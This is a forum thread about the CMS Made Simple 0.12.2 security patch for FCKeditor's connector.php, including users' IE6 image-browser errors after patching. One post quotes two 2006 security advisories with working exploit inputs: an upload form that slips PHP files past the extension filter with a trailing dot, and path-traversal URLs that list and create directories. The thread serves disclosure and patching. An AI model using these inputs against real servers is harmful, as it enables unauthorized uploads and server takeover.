0.12.2 Released! Please READ!

[Ted]

Basically, the connector.php file isn't checking permissions.  If used the right way, it can cause someone to upload anything to the uploads/images directory.  My 2nd reply above basically explains how to fix it.  I assume it'll be the same process in TinyMCE.

[fredt]

OK, I hand-patched my good old 0.11.2. Hope 0.13 arrives soon !

[MichaelK]

I updated to the latest version 0.12.2 and there's an error with the image browser.

When I wanna put an Image in my editor it won't work anymore. When I delete the code:

require_once(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(dirname(__FILE__)))))))))) . '/include.php');
check_login();

Then it works just fine!!!

This fix is not good I think.... Please help!!!!!!

[Ted]

Is anyone else having an issue with this patch?  I just tested it in 3 different places and fck image browser still works when logged in.

[evoluzzer]

Yes i stumbled over the issue.... i got an javascripterror. The directory listing is missing....

Best regards
Chris

[Ted]

Was this an upgrade to 0.12.2?  Or the manual patching?

And I'm assuming this is IE 6...

[evoluzzer]

oh, i patched it manually. cmsmadesimple is in version 0.12beta or so but with many changes. Yes it was the ie6...........

[cyberman]

cmsmadesimple is in version 0.12beta

Perhaps you should go to 0.12.1 stable to the first ...

[Ted]

Someone had the same issue while patching a 0.11.1 install this morning.  I'm thinking your best bet it to upgrade fully to 0.12.2.

[rllqph]

i didn't have any problem on the upgrade. i already upgraded to php5.1.4!

[dirtywhitellama]

Replacing that one php file fixes the security problem - right? I don't need to do anything else?

[tsw]

If you are runngin 0.12.1 then changing that one file will be enough (or you can download the diff package which replaces that file and version.php file)

[dcdent]

Taken from SecurityFocus

Code: Select all

NSAG-¹196-23.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product: 
[b]FCKeditor 2.2[/b]

Site of manufacturer:
http://www.fckeditor.net

The status: 
19/11/2005 - Publication is postponed. 
19/11/2005 - Manufacturer is notified. 
21/02/2006 - Answer of the manufacturer is absent. 
21/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/893.html

Risk: 
Critical

Description: 
Detour of a filtration of expansions of files is possible.

Influence: 
Loading of the forbidden files on target system. 

Exploit:

<form action="http://host/filemanager/browser/default/connectors/php/connector
.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
File Upload<br> 
<input id="txtFileUpload" type="file" name="NewFile"> 
<br> 
<input type="submit" value="Upload"> 
</form>

In the end of a name of a loaded file to put a symbol "."(dot) (an example: testfile.php.) 
As a result on a server the file testfile.php will be created

Decision:
The decision from the manufacturer is not known. Contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!

www.nsag.ru 
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.

and

Code: Select all

Advisory:
NSAG-¹195-23.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product: 
FCKeditor 2.0 FC

Site of manufacturer:
http://www.fckeditor.net

The status: 
19/11/2005 - Publication is postponed. 
19/11/2005 - Manufacturer is notified. 
21/02/2006 - Answer of the manufacturer is absent. 
21/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/952.html

Risk: 
Hide

Description: 
The output for limits of a virtual directory is possible.

Influence: 
Listing of directories, creation of folders outside a virtual directory.

Exploit:

http://SERVER/filemanager/browser/default/connectors/php/connector.php?C
ommand=GetFoldersAndFiles&Type=File&CurrentFolder=../../

http://SERVER/filemanager/browser/default/connectors/php/connector.php?C
ommand=CreateFolder&Type=File&CurrentFolder=../../&NewFolderName=TESTNAM
E

Decision: 
To address on a site of the manufacturer http://www.fckeditor.net
Or contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected
from a various sort of attacks of malefactors!

www.nsag.ru 
«Nemesis» © 2006
------------------------------------ 
Nemesis Security Audit Group © 2006.

[miss_d_bus]

I get thiis javascript error when trying to insert an image too:

Line:118
Char:2
Code:0
Error:Object required
URL:http://www.domain.com/modules/FCKeditor ... slist.html

I upgraded to 0.12.2 from 0.11.2 I think it was.
I'm using IE6 if that helps...

[Ted]

You made the patch to connector.php?  It wasn't a full upgrade, right?